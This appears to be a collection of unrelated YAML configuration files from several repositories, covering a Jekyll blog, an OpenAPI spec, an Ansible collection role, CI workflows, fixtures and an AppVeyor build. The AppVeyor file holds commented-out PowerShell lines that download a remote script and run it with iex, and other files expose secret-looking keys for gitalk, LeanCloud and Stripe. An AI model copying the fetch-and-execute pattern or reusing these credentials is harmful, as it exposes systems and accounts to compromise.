- jekyll-feed # 自动生成 SSR 源
- jemoji # 解析 emoji
- jekyll-sitemap # 自动生成 sitemap
- jekyll-seo-tag # 自动 SEO 头信息生成
# - jekyll-html-pipeline #
# - jekyll-mentions # 用于 @github 用户
collections:
journey:
output : true
permalink : /journey/:path.html
# design-mode:
# output : true
# permalink : /design-mode/:path.html
# 导航
navs:
-
href : /
label : 首页
-
href : /categories/
label : 技术笔记
-
href : /journey/
label : 旅行
-
href : /foods/
label : 美食
-
href : /thoughts/
label : 感悟
-
href : /about/
label : 关于
subscribe_rss : /feed.xml
# 评论模块
# gitalk:
# owner : zoharyips
# repo : blog-comments
# clientID : 4f7905fa91963e1cb585
# clientSecret : 860aa59b9dac0ff81e468c3a67bec5a052e8b8ec
# 站内搜索
simple_jekyll_search:
fulltext : false
# leanCloud 访问统计
leancloud:
enable: true
app_id: 7EiyLoiTRMpJGKx5Jyy6FV0S-gzGzoHsz
app_key: 0l02blBLDj6noCkLMoF76LD8
data_class_name: visited_times
ip_class_name: visiting_ip
# 谷歌分析
google:
analytics_id : UA-146513129-1
# 备案号
beian : 粤ICP备
MIIT : http://www.beian.miit.gov.cn
|
_config.yml
|
openapi: 3.0.0
info:
description: The Tateru Machine Service is a repository of machine metadata and manager routing information.
version: 0.0.2
title: Tateru Machine Service API
license:
name: Apache 2.0
url: 'http://www.apache.org/licenses/LICENSE-2.0.html'
tags:
- name: inventory
description: Inventory scanning
- name: deploy
description: Deployment operations
paths:
/v1/machines:
get:
tags:
- inventory
summary: fetches all known machines
operationId: fetchMachines
description: |
Returns all currently active machine objects
parameters:
- name: alias
in: query
description: 'Filter on known aliases for machines (e.g. name)'
schema:
type: string
responses:
'200':
description: list of machine objects
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/Machine'
/v1/installer-callback:
post:
tags:
- deploy
summary: send an installation callback to notify Tateru that an installer has booted
operationId: bootInstaller
description: |
When the Tateru installation software has booted it will call this endpoint to provide inventory
and address to be reached at. It will be provided with an SSH public key to allow as response.
requestBody:
content:
application/json:
schema:
type: object
properties:
uuid:
type: string
example: d290f1ee-6c54-4b01-90e6-d701748f0851
serialNumber:
type: string
example: XYZ1234
assetTag:
type: string
example: '00203'
required:
- uuid
responses:
'200':
description: the request succeeded
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/CallbackResponse'
'404':
description: the requested machine was not found
components:
schemas:
Machine:
type: object
required:
- uuid
properties:
uuid:
type: string
format: uuid
example: d290f1ee-6c54-4b01-90e6-d701748f0851
serialNumber:
type: string
example: XYZ1234
assetTag:
type: string
example: '00203'
name:
type: string
example: VMLNX01
managedBy:
type: string
example: 'http://tateru-vsphere.corp.local:7707/'
CallbackResponse:
type: object
required:
- ssh_pub_key
properties:
ssh_pub_key:
type: string
format: uuid
example: 'ssh-ed25519 AAA[..]AAV user@laptop'
|
api/machine-service.api.yaml
|
---
- name: Get Openstack Release Data
openstack_release:
register: osa_details
- name: Run snitch collector - Newton +
become: yes
command: "openstack-ansible snitch.yml --forks {{ cloud_snitch_forks }}"
environment:
CLOUD_SNITCH_ENABLED: true
CLOUD_SNITCH_CONF_FILE: "{{ cloud_snitch_conf_file }}"
CLOUD_SNITCH_CRYPT_ENABLED: "{{ cloud_snitch_crypt_enabled }}"
CLOUD_SNITCH_CRYPT_KEY: "{{ crypto_aes_key }}"
CLOUD_SNITCH_RUN_ID: "{{ run_id }}"
CLOUD_SNITCH_ENVIRONMENT_ACCOUNT_NUMBER: "{{ cloud_snitch_environment_account_number }}"
CLOUD_SNITCH_ENVIRONMENT_NAME: "{{ cloud_snitch_environment_name }}"
CLOUD_SNITCH_ENVIRONMENT_UUID: "{{ cloud_snitch_environment_uuid }}"
ignore_errors: yes
args:
chdir: "{{ cloud_snitch_playbook | dirname }}"
tags:
- collect
when: osa_details.major_release and osa_details.major_release >= 14
async: "{{ cloud_snitch_collection_timeout }}"
poll: "{{ cloud_snitch_collection_poll }}"
- name: Run snitch collector - Mitaka -
become: yes
command: "openstack-ansible snitch.yml --forks {{ cloud_snitch_forks }}"
environment:
CLOUD_SNITCH_ENABLED: true
CLOUD_SNITCH_CONF_FILE: "{{ cloud_snitch_conf_file }}"
CLOUD_SNITCH_CRYPT_ENABLED: "{{ cloud_snitch_crypt_enabled }}"
CLOUD_SNITCH_CRYPT_KEY: "{{ crypto_aes_key }}"
CLOUD_SNITCH_RUN_ID: "{{ run_id }}"
CLOUD_SNITCH_ENVIRONMENT_ACCOUNT_NUMBER: "{{ cloud_snitch_environment_account_number }}"
CLOUD_SNITCH_ENVIRONMENT_NAME: "{{ cloud_snitch_environment_name }}"
CLOUD_SNITCH_ENVIRONMENT_UUID: "{{ cloud_snitch_environment_uuid }}"
ANSIBLE_INVENTORY: "{{ cloud_snitch_inventory_locations | join(':') }}"
ANSIBLE_SSH_PIPELINING: "True"
ANSIBLE_HOST_KEY_CHECKING: "False"
ignore_errors: yes
args:
chdir: "{{ cloud_snitch_playbook | dirname }}"
tags:
- collect
when: osa_details.major_release and osa_details.major_release < 14
async: "{{ cloud_snitch_collection_timeout }}"
poll: "{{ cloud_snitch_collection_poll }}"
- name: Archive the dataset
become: yes
archive:
path: "{{ cloud_snitch_data_dir }}/{{ run_id }}"
dest: "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
exclude_path:
- "{{ cloud_snitch_data_dir }}"
format: gz
tags:
- collect
- name: Fetch the dataset
fetch:
src: "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
dest: "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
fail_on_missing: false
flat: yes
tags:
- collect
- name: Sync the dataset
action: sync
args:
uuid: "{{ run_id }}"
key: "{{ crypto_aes_key }}"
tags:
- collect
- name: Remove archive
become: yes
file:
state: absent
path: "{{ item }}"
with_items:
- "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
- "{{ cloud_snitch_data_dir }}/{{ run_id }}"
tags:
- collect
|
syndication/roles/collect/tasks/main.yml
|
name: 'Common CI'
description: 'Run common CI steps'
inputs:
image-name:
description: 'name of docker image that will be built'
required: true
runs:
using: "composite"
steps:
- name: Check code formatting with black
uses: psf/black@stable
with:
options: "--check --verbose"
- name: Lint code with mypy
uses: jpetrucciani/mypy-check@master
with:
path: "ckanext"
mypy_flags: "--install-types --non-interactive"
- name: Setup docker buildx
uses: docker/setup-buildx-action@v1.6.0
- name: Get current git commit hash
id: get-git-commit-hash
uses: priyesh2609/sha-trim-action@v1.1.1
- name: Get current git branch name
uses: EthanSK/git-branch-name-action@v1
- name: Replace invalid chars in git branch name
shell: bash
run: echo "SLUGGED_GIT_BRANCH_NAME=$(echo $GIT_BRANCH_NAME | tr / -)" >> $GITHUB_ENV
- name: Build docker image
working-directory: docker
shell: bash
env:
DEFAULT_BRANCH: main
run: |
docker pull ${{ inputs.image-name }}:$SLUGGED_GIT_BRANCH_NAME || \
docker pull ${{ inputs.image-name }}:$DEFAULT_BRANCH || \
true
docker image build \
--tag "${{ inputs.image-name }}:$SLUGGED_GIT_BRANCH_NAME" \
--tag "${{ inputs.image-name }}:$TRIMMED_SHA" \
--label git-commit=$TRIMMED_SHA \
--label git-branch=$SLUGGED_GIT_BRANCH_NAME \
--build-arg "BUILDKIT_INLINE_CACHE=1" \
--build-arg "GIT_COMMIT=$TRIMMED_SHA" \
--cache-from=${{ inputs.image-name }}:$SLUGGED_GIT_BRANCH_NAME \
--cache-from=${{ inputs.image-name }}:$DEFAULT_BRANCH \
..
- name: Stand up CI CKAN stack
working-directory: docker
shell: bash
run: |
python3 compose.py \
--compose-file=docker-compose.yml \
--compose-file=docker-compose.ci.yml \
--image-tag=$SLUGGED_GIT_BRANCH_NAME \
up
- name: Bootstrap CI CKAN stack
shell: bash
run: |
docker exec -t emc-dcpr_ckan-web_1 poetry install
docker exec -t emc-dcpr_ckan-web_1 poetry run ckan db init
docker exec -t emc-dcpr_ckan-web_1 poetry run ckan harvester initdb
docker exec -t emc-dcpr_ckan-web_1 poetry run ckan db upgrade -p dalrrd_emc_dcpr
- name: Run unit tests
shell: bash
run: |
docker exec -t emc-dcpr_ckan-web_1 poetry run pytest \
--ckan-ini docker/ckan-ci-settings.ini \
-m unit \
--cov
- name: Run integration tests
shell: bash
run: |
docker exec -t emc-dcpr_ckan-web_1 poetry run pytest \
--ckan-ini docker/ckan-ci-settings.ini \
-m integration \
--cov
- name: Wind down ckan stack
shell: bash
working-directory: docker
run: |
python3 compose.py \
--compose-file=docker-compose.yml \
--compose-file=docker-compose.ci.yml \
--image-tag=$SLUGGED_GIT_BRANCH_NAME \
down
|
.github/actions/action-common-ci/action.yml
|
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutRestStep:
workoutRestStep (template):
status: active
thorWorkoutStep4:
workout: @thor
exercise: @rest
duration: 30
position: 4
thorWorkoutStep8:
workout: @thor
exercise: @rest
duration: 30
position: 8
fafnirWorkoutStep2:
workout: @fafnir
exercise: @rest
duration: 30
position: 2
fafnirWorkoutStep4:
workout: @fafnir
exercise: @rest
duration: 30
position: 4
fafnirWorkoutStep6:
workout: @fafnir
exercise: @rest
duration: 30
position: 6
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutNorStep:
workoutNorStep (template):
status: active
thorWorkoutStep1:
workout: @thor
exercise: @squat
numberOfRepetition: 50
position: 1
thorWorkoutStep2:
workout: @thor
exercise: @sitUp
numberOfRepetition: 30
position: 2
thorWorkoutStep3:
workout: @thor
exercise: @pushUp
numberOfRepetition: 15
position: 3
thorWorkoutStep5:
workout: @thor
exercise: @squat
numberOfRepetition: 50
position: 5
thorWorkoutStep6:
workout: @thor
exercise: @sitUp
numberOfRepetition: 30
position: 6
thorWorkoutStep7:
workout: @thor
exercise: @pushUp
numberOfRepetition: 15
position: 7
thorWorkoutStep9:
workout: @thor
exercise: @squat
numberOfRepetition: 50
position: 9
thorWorkoutStep10:
workout: @thor
exercise: @sitUp
numberOfRepetition: 30
position: 10
thorWorkoutStep11:
workout: @thor
exercise: @pushUp
numberOfRepetition: 15
position: 11
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutDistanceStep:
sleipnirWorkoutStep1:
workout: @sleipnir
exercise: @run
distance: 10000
position: 1
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutAmrapStep:
fafnirWorkoutStep1:
workout: @fafnir
exercise: @burpee
duration: 60
position: 1
fafnirWorkoutStep3:
workout: @fafnir
exercise: @mountainClimber
duration: 60
position: 3
fafnirWorkoutStep5:
workout: @fafnir
exercise: @burpee
duration: 60
position: 5
fafnirWorkoutStep7:
workout: @fafnir
exercise: @mountainClimber
duration: 60
position: 7
|
src/CuteNinja/HOT/WorkoutBundle/Resources/fixtures/WorkoutStep.yml
|
- project: Website Design and User Experience
role: Conestoga College, Kitchener ON Canada
duration: Sept 2016 — Oct 2016
# url: "#"
description: <ul class="resume-item-list"><li><b>Tools Used</b> — Balsamiq and Microsoft Visio</li><li>Request for the information(RFI) from the client</li><li>Collect the requirements of a website from users, client and other stakeholders</li><li>Managed wireframes for the graphical representation of client product used for immediate client feedback</li><li>Developed mockups to elicit the detailed information for the further development</li></ul>
# Conestoga College
- project: User Experience Design
role: Conestoga College, Kitchener ON Canada
duration: Oct 2016 — Nov 2016
# url: "#"
description: <ul class="resume-item-list"><li><b>Tools Used</b> — Proto.io,Microsoft Visio and Microsoft Word</li><li>Organized meetings with the client to prepare and update business process requirements</li><li>Developed use cases to depict the role of each actor</li><li> Gathered demographic information to make strategy documentation</li><li>Created mockups for the user interface design using Proto.io</li></ul>
# Conestoga College
- project: Production Inefficiency
role: Conestoga College, Kitchener ON Canada
duration: Nov 2016 — Dec 2016
# url: "#"
description: <ul class="resume-item-list"><li><b>Tools Used</b> — Microsoft Excel, Microsoft Visio and Adobe InDesign CC</li><li>Prioritized business and system problems</li><li>Determined the causes and effects(Fish-bone Diagram) in the manufacturing of the project</li><li>Presented the AS-IS and TO-BE scenario for the production</li><li>Redesigned the layout of the factory by doing spaghetti analysis</li></ul>
# Punjab Technical University
- project: Flip and Trip
role: Punjab Technical University, Punjab, India(Group project-Part of Development Team)
duration: Jan 2013 — May 2013
# url: "#"
description: <ul class="resume-item-list"><li><b>Technologies Used</b> — C sharp, ASP.Net, SQL Server 2005, HTML and CSS</li><li>The project turns travel planning into fun and exciting social activities by discovering some of the best attractions, restaurants and hotels around the world</li><li>Developed a user friendly interface for selecting hotels, retaurants and attractions</li><li>Increased the efficiency to automation</li><li>Used prototype model for software development</li></ul>
|
_data/projects.yml
|
---
- functions:
- {name: unsafePerformIO, within: [PlutusPrelude, Language.PlutusCore.Generators.Internal.Entity]}
- {name: error, within: [Main, Language.PlutusCore.Generators.Interesting, Evaluation.Constant.Success, Language.PlutusCore.Constant.Apply, Language.PlutusCore.Constant.Typed, Language.PlutusCore.Evaluation.CkMachine, Language.PlutusCore.Generators.Internal.Entity, Language.PlutusCore.Constant.Make, Language.PlutusCore.Generators.Internal.TypedBuiltinGen, Language.PlutusCore.TH]}
- {name: undefined, within: [Language.PlutusCore.Constant.Apply]}
- {name: fromJust, within: []}
- {name: foldl, within: []}
- error: {lhs: "hylo embed", rhs: "ana", name: "Use anamorphism"}
- error: {lhs: "hylo f project", rhs: "cata f", name: "Use catamorphism"}
- error: {lhs: "concat", rhs: "fold", name: "Generalize concat"}
- error: {lhs: "concatMap", rhs: "foldMap", name: "Generalize concatMap"}
- error: {lhs: "f >> pure ()", rhs: "void f", name: "Use void"}
- error: {lhs: "over _1 f x", rhs: "first f x", name: "Use arrows"}
- error: {lhs: "over _2 f x", rhs: "second f x", name: "Use arrows"}
- error: {lhs: "bool x x p", rhs: "x", name: "Redundant bool"}
- error: {lhs: "maybe mempty", rhs: "foldMap", name: "Use foldMap"}
- error: {lhs: "mconcat", rhs: "fold", name: "Generalize mconcat"}
- ignore: {name: Reduce duplication, within: [Language.PlutusCore.Renamer, Language.PlutusCore.Constant.Prelude, Language.PlutusCore.StdLib.Data.Bool, Language.PlutusCore.StdLib.Data.ChurchNat, Language.PlutusCore.StdLib.Data.Function, Language.PlutusCore.StdLib.Data.List, Language.PlutusCore.StdLib.Data.Nat]}
- ignore: {name: Redundant $, within: [Evaluation.Constant.Success, Language.PlutusCore.Generators.Internal.TypedBuiltinGen]}
# this is rarely an improvement, also ignored in cardano
- ignore: {name: Move brackets to avoid $}
# this aids clarity since you can name the parameters
- ignore: {name: Avoid lambda}
- fixity: infixr 8 .*
- fixity: infixr 3 ***
- fixity: infixr 3 &&&
- fixity: infixr 1 <=<
|
.hlint.yaml
|
version: 19.5.0.{build}
image: Visual Studio 2017
environment:
STRIPE_TEST_SK: sk_test_eBgAzVoEpJKfYjD9nf2YoyMM
# If you bump this, don't forget to bump `MinimumMockVersion` in `BaseStripeTest.cs` as well.
STRIPE_MOCK_VERSION: 0.30.0
deploy:
- provider: NuGet
api_key:
<KEY>
on:
appveyor_repo_tag: true
cache:
- stripe-mock -> appveyor.yml
install:
- ps: |
If(!(Test-Path "stripe-mock"))
{
New-Item -Path . -Name "stripe-mock" -ItemType "directory" -Force | Out-Null
wget "https://github.com/stripe/stripe-mock/releases/download/v$($env:STRIPE_MOCK_VERSION)/stripe-mock_$($env:STRIPE_MOCK_VERSION)_windows_amd64.tar.gz" -OutFile "$($pwd)\stripe-mock\stripe-mock.tar.gz"
7z.exe e -y -o"stripe-mock" "stripe-mock\stripe-mock.tar.gz" | Out-Null
7z.exe x -y -o"stripe-mock" "stripe-mock\stripe-mock.tar" | Out-Null
}
$app = Start-Process -FilePath "stripe-mock\stripe-mock.exe" -NoNewWindow -PassThru
Write-Host ("stripe-mock running, Id = $($app.Id)`n") -ForegroundColor Green
before_build:
- ps: Write-Host $("`n HOST INFORMATION `n") -BackgroundColor DarkCyan
- dotnet --info
- ps: Write-Host $("`n RESTORING PACKAGES FOR ALL FRAMEWORKS `n") -BackgroundColor DarkCyan
- dotnet restore src\
build:
parallel: true
build_script:
- ps: Write-Host $("`n BUILDING EVERYTHING `n") -BackgroundColor DarkCyan
- dotnet build -c Release src\Stripe.net
- dotnet build -c Debug src\Stripe.net
- dotnet build src\StripeTests -c Debug
after_build:
- ps: Write-Host $("`n PACKING UP `n") -BackgroundColor DarkCyan
- dotnet pack -c Release src\Stripe.net
test_script:
- ps: Write-Host $("`n RUNNING THE NEW XUNIT + STRIPE-MOCK TESTS `n") -BackgroundColor DarkCyan
- dotnet test src\StripeTests\StripeTests.csproj
artifacts:
- path: '**\*.nupkg'
# these commands tell appveyor to open an RDP session for debugging
#init:
#- ps: iex ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/appveyor/ci/master/scripts/enable-rdp.ps1'))
#
#on_finish:
#- ps: $blockRdp = $true; iex ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/appveyor/ci/master/scripts/enable-rdp.ps1'))
|
appveyor.yml
|
name: Test SnakemakeProfiles/slurm
env:
SNAKEMAKE_IMAGE: quay.io/biocontainers/snakemake:6.15.5--hdfd78af_0
SLURM_IMAGE: giovtorres/docker-centos7-slurm:20.11.8
DOCKER_COMPOSE: tests/docker-compose.yaml
on: [push, pull_request]
jobs:
slurmtest:
name: Test slurm profile in docker containers
runs-on: ubuntu-latest
timeout-minutes: 30
steps:
- uses: actions/checkout@v2
- run: mkdir -p ~/image-cache
- name: cache-conda
uses: actions/cache@v2
env:
CACHE_NUMBER: 0
with:
path: ~/conda_pkgs_dir
key: ${{ runner.os }}-conda-${{ env.CACHE_NUMBER }}-${{ hashFiles('test-environment.yml') }}
- uses: actions/cache@v2
id: cache-images
env:
CACHE_NUMBER: 0
with:
path: ~/image-cache
key: image-cache-${{ runner.os }}-${{ env.CACHE_NUMBER }}-${{ env.SNAKEMAKE_IMAGE }}-${{ env.SLURM_IMAGE }}
- name: install miniconda
uses: conda-incubator/setup-miniconda@v2
with:
mamba-version: "*"
channels: conda-forge,bioconda,default
channel-priority: true
environment-file: test-environment.yml
use-only-tar-bz2: true
- name: docker swarm init
run: docker swarm init
- if: steps.cache-images.outputs.cache-hit == 'true'
run: docker load -i ~/image-cache/snakemake.tar
- if: steps.cache-images.outputs.cache-hit == 'true'
run: docker load -i ~/image-cache/slurm.tar
- name: docker deploy
shell: bash -l {0}
env:
DOCKER_COMPOSE: ${{ env.DOCKER_COMPOSE }}
SNAKEMAKE_IMAGE: ${{ env.SNAKEMAKE_IMAGE }}
SLURM_IMAGE: ${{ env.SLURM_IMAGE }}
run: ./tests/deploystack.sh
- if: steps.cache-images.outputs.cache-hit != 'true'
run: docker save -o ~/image-cache/snakemake.tar ${{ env.SNAKEMAKE_IMAGE }}
- if: steps.cache-images.outputs.cache-hit != 'true'
run: docker save -o ~/image-cache/slurm.tar ${{ env.SLURM_IMAGE }}
- name: run tests
shell: bash -l {0}
run: |
pytest -v -s tests/test_cookie.py
pytest -v -s tests/test_utils.py
pytest -v -s tests/test_slurm.py --slow
pytest -v -s tests/test_slurm_advanced.py --slow
|
.github/workflows/slurm.yaml
|